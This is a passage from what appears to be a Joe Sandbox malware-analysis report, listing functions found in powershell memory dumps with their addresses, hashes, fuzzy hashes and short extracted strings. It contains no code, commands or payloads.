                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N
                                                                                                    • API String ID: 0-3326779747
                                                                                                    • Opcode ID: 68311d9802d7d03069c1bcc2b7e3e318ff85ebd2256d5047cf08f90fd5376763
                                                                                                    • Instruction ID: 8736ed9f4bd192d93bed1bd0cbb210bd7e7c061b4f9c1120f1d75ff84b5da3f4
                                                                                                    • Opcode Fuzzy Hash: 68311d9802d7d03069c1bcc2b7e3e318ff85ebd2256d5047cf08f90fd5376763
                                                                                                    • Instruction Fuzzy Hash: B812B671E0895E8FEB55EB1CC8A55F9BBA2FF54310F2481B6D059C71D2DE28AC42C7A0
                                                                                                    Function 00007FFCF413D6AD Relevance: .7, Instructions: 689COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1ea87181db3bfa259ae8c37d27874e9032e4abab4b49eb1679d038cc98488be7
                                                                                                    • Instruction ID: b74e7f861dc4754bcede9daa8fbfa35aa50611894165d8e3ef796efbb74acd87
                                                                                                    • Opcode Fuzzy Hash: 1ea87181db3bfa259ae8c37d27874e9032e4abab4b49eb1679d038cc98488be7
                                                                                                    • Instruction Fuzzy Hash: B4224772D0D79E8FE746D658C8A55B1BBE2EF92324B2840FEC099870D3E9196807C771
                                                                                                    Function 00007FFCF41325DA Relevance: .5, Instructions: 488COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7beaea1d82d6243297b5b08eae502e58cf8120b3908f15747a5881321648fffb
                                                                                                    • Instruction ID: 18398da9c0c085ec93369116c4f756b6cc17c15edd81046a285da714cf8e3e6a
                                                                                                    • Opcode Fuzzy Hash: 7beaea1d82d6243297b5b08eae502e58cf8120b3908f15747a5881321648fffb
                                                                                                    • Instruction Fuzzy Hash: 59E1C0A3E0D6E65BF756A63CA8B51F5AFA1EF5262472940F7C4948A0E39C0D180AC371
                                                                                                    Function 00007FFCF413235A Relevance: .2, Instructions: 206COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b0be964bf86a9d4bc2dd8aaecd66521cf15b8a37be02f111136243804f2664eb
                                                                                                    • Instruction ID: bb7dcf0f5cfd5e6bffa0f7702978edb05fd7a9d01e316a5535d40ca80f145c30
                                                                                                    • Opcode Fuzzy Hash: b0be964bf86a9d4bc2dd8aaecd66521cf15b8a37be02f111136243804f2664eb
                                                                                                    • Instruction Fuzzy Hash: 20517EA3E0E6E65FF752666898B60F57FA1EF5322071940F7C4A48B0D3E91D2806C772
                                                                                                    Function 00007FFCF41302AD Relevance: 6.5, Strings: 5, Instructions: 231COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8d~*$@JIN$p@]N$s}ZI$x.IN
                                                                                                    • API String ID: 0-2117975329
                                                                                                    • Opcode ID: 1374cbed9afebab758603d17096ea2e707b88572b105a4f90ff3f055256fa358
                                                                                                    • Instruction ID: 6e39fe92c1ca8f8b2af38134c1651d7878aa6e5c1fa8a7081d13d78d5534bd3a
                                                                                                    • Opcode Fuzzy Hash: 1374cbed9afebab758603d17096ea2e707b88572b105a4f90ff3f055256fa358
                                                                                                    • Instruction Fuzzy Hash: BB71E543D0F9E61FF711866859B4178AFD2AF92750B7880FBD0F94A0EBA858B905C371
                                                                                                    Function 00007FFCF41303CD Relevance: 6.3, Strings: 5, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @JIN$PM4J$p@]N$s}ZI$x.IN
                                                                                                    • API String ID: 0-2180078961
                                                                                                    • Opcode ID: de397138b6b713b72d004f9c9e7d025f9159bd2929b501464d5ef9c2892b6a78
                                                                                                    • Instruction ID: a89c4c0a02a9db54f3c93ea7b0b95f1af0cca13f2375fa5b9ef8ebb38a897b8e
                                                                                                    • Opcode Fuzzy Hash: de397138b6b713b72d004f9c9e7d025f9159bd2929b501464d5ef9c2892b6a78
                                                                                                    • Instruction Fuzzy Hash: 04218543D0FAE60FE746467C98641749FD2AF9265072D80FBD0F84B0EBA858AE09D375
                                                                                                    Function 00007FFCF420ABBB Relevance: 5.3, Strings: 4, Instructions: 289COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BNv*$Xz+$Xz+$`7K:
                                                                                                    • API String ID: 0-3782686236
                                                                                                    • Opcode ID: e875d4dea062d779a9e80b6dde60ab7a677793770672d9564cfc20860994422d
                                                                                                    • Instruction ID: e6a0d6822d69974bfdd387a066218a916e7c123c4c6b5ef3a672ed2d314b08f0
                                                                                                    • Opcode Fuzzy Hash: e875d4dea062d779a9e80b6dde60ab7a677793770672d9564cfc20860994422d
                                                                                                    • Instruction Fuzzy Hash: E391E462E1CA9A4FE759E62C88B6274B7D2EF65302F5801BDC46DC72C3DD29AC05C361
                                                                                                    Function 00007FFCF420A38B Relevance: 5.3, Strings: 4, Instructions: 280COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BNv*$Xz+$Xz+$`7K:
                                                                                                    • API String ID: 0-3782686236
                                                                                                    • Opcode ID: b084eb825522f7f4f23ba2872b26077b9d779acb2f426245560d6c48fe5d4b96
                                                                                                    • Instruction ID: ad2f5e07d2b76ae106756c519e99f3c4251db184f6690669d94620056aeab335
                                                                                                    • Opcode Fuzzy Hash: b084eb825522f7f4f23ba2872b26077b9d779acb2f426245560d6c48fe5d4b96
                                                                                                    • Instruction Fuzzy Hash: 3791E222E1CA8A4FE759E72C88B6174B7D2FF64301B9801BAD46DC72C3DE25AC05C361
                                                                                                    Function 00007FFCF420190D Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (}+$H|+$H|+$J{v*
                                                                                                    • API String ID: 0-1283508578
                                                                                                    • Opcode ID: 2e83372ac02f1008786c4dd403e42e1131324933ac04783443f24e69f1fd0af9
                                                                                                    • Instruction ID: 772e4995e049a4258629ebb9a6f884f8ac4223e8dc836cdd79f46a44fc713612
                                                                                                    • Opcode Fuzzy Hash: 2e83372ac02f1008786c4dd403e42e1131324933ac04783443f24e69f1fd0af9
                                                                                                    • Instruction Fuzzy Hash: 1351DF31E0DA9D4FEB99DA5CC4A5278B7E2EF55301B1801BDC05DC71C6DE2AAC45C721